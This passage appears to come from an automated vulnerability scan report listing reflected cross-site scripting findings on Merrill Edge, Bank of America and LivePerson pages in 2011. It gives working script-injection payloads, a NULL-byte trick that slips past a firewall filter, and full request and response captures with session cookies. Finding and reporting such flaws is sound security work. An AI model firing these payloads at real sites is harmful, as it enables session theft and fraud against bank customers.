set-cookie: SMIDENTITY=hoJ5bVwThbLH86Bjyu48Es2jRhc8iOESnqDXj0LnEg1csQRMXjHDOb4jHvPkIhyGgEqr7X6vYdBuaqqVx+kE9qPd459uOwbm4W/yYiwnrb5gJZHd76NalTrAfQ/gCOoYs2ynyhGhoKNjaFMSBZBEj1wfT8do3SbvUvvYfgahTCyttCimYfLHcLaGRvGWm8BmNux9oY5ScVwyCYCj2856TGu+RGzmr0gSK8WxcLcxPWoYFa587s8fo2h3NtiXW7Tc4Mpy++mj/fEdWpr2LH5oMtEpZtkHBKUvM+bv6Aiy9mlOd6DHj7/CXbS7wfOq70DKhDnvs3LUxDIqRJ+jdP+JnUPekYkzYP2/08x1ik2WQoNhv6N/I8Trn5VBOgyUO7UeU5j4eRemhUY3qAkQPs+gMyJShzBKWsjwlXC0mj+vPbOyfLsHQemSqbrr7BlB6NabnVeWcrpZe6FiSYMhSFqsTHmMeJSn8IuFBQcm6haafR+SwCKuhzQ3+OBP8P4cszZPGskJJCmA19e5UYQGNwBkfL1qjLexQiJqnH5tDWSffceN0O4Q4FgsynOdkYIqSsuxyKGesd/GsS2tEaNZ3zuKoxwzeMNzsWxYHXaLYTcjodahqcQDtZyer8BulQMpAq7U; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=88bab72aaec248caa0bda82a0753db2b; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'BAC1.13948';f91d272c668'
,'Page' : 'self-directed-investing'
,'preview' : false
};
//]]>
...[SNIP]...

2.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jMony3R0uEAbpypigm1EqY9Eg0ka5p+s44FIvc2oUz5Z/wm8XPoHB57oXX6p1ZQA1DMjN7Fkqd7yMuSEoD+LuEY+PIcpqc1A+WhYxAVvAS5Mie9+h3Xg+4c3+kYlFSvEz3UpkPXz2dFWHd4q8OPwN7iE9R1mkHhxNdUlIgpDnfnTKg9TIu4lpNgijOTXs7WcTVqT1waWnPj5TycKZSglP/Y1ipyGZ/Fj8KAUBAXlxRS2ncxyP0ksv3C//Cpm+KmfY/dH8g7dE14aedon04IBavIlUgxkxGyknF/+dEUjIKLMQvQ0EX9oEli4zbjRdIhyNrwAr+x0+U094wy+JR9858XxOamVAke3rmbX53dEhO4t0kp9QYiArkeppHcpC6Z9RtxIzxoshDC9wgy0gE7g7hw/O8nbph9a/nrYz/THwFlHWXiMvyr9oPT8hkJ0LFjAXMCTs/me9ZcJjDmYlROpBRtAeF5epzMrZyaDqD2QaD6P9CsJbJ2hUQ0HO4+VGOcJj3VkIC5aMkOoah0L85ZoaFRerZaLlRxcon+yWX/xl7wYZ+qw7MWYXE0z2CPIlEMtKGzocLzcccMuREJylnZJ89GC5zpCTyCvcr4hTZ+4xyLR8hNutAJADZGh34QNjAaM; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=33db602922214f42975d86f8f6f2abba; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92020


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.93556"><script>alert(1)</script>754868bc16e=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

2.110. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [src_cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=Y4Z5b3uo6rKQp7PZz1s7s9yXgmFTKijqUV015O8wStTxc7G2C5c/kbFP4UDJSZSCfc9kU1Zw0HPh6llknGXwT7FshfHuhHre4H12yqv+NsahK2hDOuHu+3ZVPSGQegqEiFwbgiyXej8GttJGr4jmDlzRt2NMfbp9kjsuFK145M8vpfup6jzSHS0+G/3w8oSVuzTS9SNAv261lf9YY2QISx+/0X92nDD+NHMbyTU6YJt7RUGp5FU8gFZQhAEDkxssVsz6dR2qsnUQanaggpG+B6Vs9X+ZqD8ZBjGltqkjuILtZiZmdgL0c0Gme4lSluedVE1O2mwh6P04o2UIfbyLMVDJihe7PxeeVfsRVm/cZ2gWBeaQY6wEGEO/+R+ong+zsziMbYL9onbmbQSNjjKnYnOQtptOrCFoSyfvTK/V0R5q4LwxjyoTyDhOxE3BT8otfSw3ZmyeeW2KE3DBGncDuOSKG1hawQgLNpZrFmk1W59jk6WWXLdREST1E5h28CX2HVON8CVqCBuI23KewBu/Sqs5c5q2Jwf5c14tiLzlrJqgZAgzlgNpZiHIjFJbgpz3j+/TxYDc3CIP9gzOmSJtfAFP70l04QgCCQ1eAIi3toAaaj6vxuF5ZYNBaJ2U8Kht; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=2ac698daf6734109aef33eb2bf698471; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'SDMST1.ed4ab';713afc694b6'
,'Page' : 'zero-dollar-trades'
,'preview' : false
};
//]]>
...[SNIP]...

2.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=uHHgf03wURm9mvTJ9rrHz3gor/OaFylTVOa7LZNqyrpVkFQYgCjxrq1MlJxhpv2s8S5SnvotXt7tQRkg1oj8ac6TAyCDYWVk5OI6q60ucqyCid0nYOfasFeN5k79muZtxFnXpPrW5HggpNGzxjZBbrtgttnzLQoi0NdJ0EATioVlrNut1YRVGoL21K2kSPLzvUBBFf6oZYt7sN64q7mizmdGpLFbgCB08LFW8zuvv+u5e/wyWlN+FV8JFqyNfgCUCwcLY3BiIcuSBGID9GafFcg/ENw3HMU9CfxVHKKxripqd3lFzMgHxffHzdLwD6oI95pvKnQPK5vOFdj69JNFwgpQRG9zYy7q7GpgQUqfbrqJ+NLI8LL/PwBtIdRBr9/dBFruWJGWEX3uAU+nlx0q6Taj6ij93G/Hh/jviT3UsQFCVY60yf+Xlei7TQC9CbWMDDe3VpZk2Wjq0Q/vGHKRGh//LFI1MbqU/ew6isZ33kXOvh86d/ZnJxtYefczmmtP/gyln26n1iRLUiAMsMBIxtSn3GMHUMrEOtIwPlwAyFiHTYxLtlzOQloZa+n1jge5HAkGzyGVBZsToP7YAZkibI9njnxdCxpJ1KOBkLJUBU+W3m2MLXnua2iEZv7vF5ql; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=64d545196def45c0ab618229e403d55c; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.b5a88"><script>alert(1)</script>68ae74c56a4=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

2.112. http://www.retirement.merrilledge.com/IRA/ScriptResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/ScriptResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5518


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
/ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace")
...[SNIP]...

2.113. http://www.retirement.merrilledge.com/IRA/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 3965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script>
...[SNIP]...

2.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=dIEXSEv/0xGBaoStRHjbLBFpbuTZ8Y6DJsxG1YEiFq+ckpbUGEPvF5soHoRCTuqdY5GFAi7V689a3IoXqMyRsNOMmpFP9ZyxbS3fP18I2G8eKZUwPltSUnDZ+XowkaqzT845OkRm0H5eBEzw8EzY0dTi3m0KD2RfAU0rM27TX+C/UCHWIWQbvjfMWMVrSs5JWS6fWy23rnDP/DKIrVlH2rFTaVbddQamnQgVSpdZ0Vrf0BEfULPfNXzQrYUBApPspod1ih7hD6GdecmOLuW6iwxf4RFqyhHMsCYkRh5mpVON9vK201ZlkRP+HjcN2h7mPdq5MW1j7b2AKzhjQdsy4gqqpYB1Ea5KIs6iL59fIeLHRF2dJfWHE0UipyvrblJ6M6tpPQDW/cLYslbceWqoa2ohyAuWIZgkMb8Vt/WVM81r/V/AhEi1RsDXMtI0IxdkRUqT+914Cn22id6le4Ek42m7twdj5zjXArs+0i22BTRdo28rygzloxbqLhbDfXfnaHiQ/erYFM7waoK8lv2y5Le/PNhYPGABf9hyV84T/SUGjzjjQgscaNhulf/UuxzSRIVu4AV2axWy6eD2kvUlaxUOzI9LLvTr7sTy8JWmXbj4pngOl2TytK3hx78r2Aqb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=ede7c355a551459fb3f0986a23c39c18; domain=.merrilledge.com; path=/
Set-Cookie: BrowserCheckDone=true; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

2.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www2.bankofamerica.com
Path:   /promos/jump/greatdeals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:31 GMT
Content-type: text/html
Set-Cookie: SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; path=/; domain=.bankofamerica.com; secure
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close

<HTML>
<HEAD>
<TITLE>An Error Has Occurred</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF">

<FORM ACTION="/cferror.cgi" METHOD=POST>

<SCRIPT LA
...[SNIP]...
<XMP> 3BB0E" A=B B8409311022
</XMP>
...[SNIP]...

2.116. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33074
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/
Date: Wed, 02 Feb 2011 22:00:02 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3">
...[SNIP]...

2.117. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

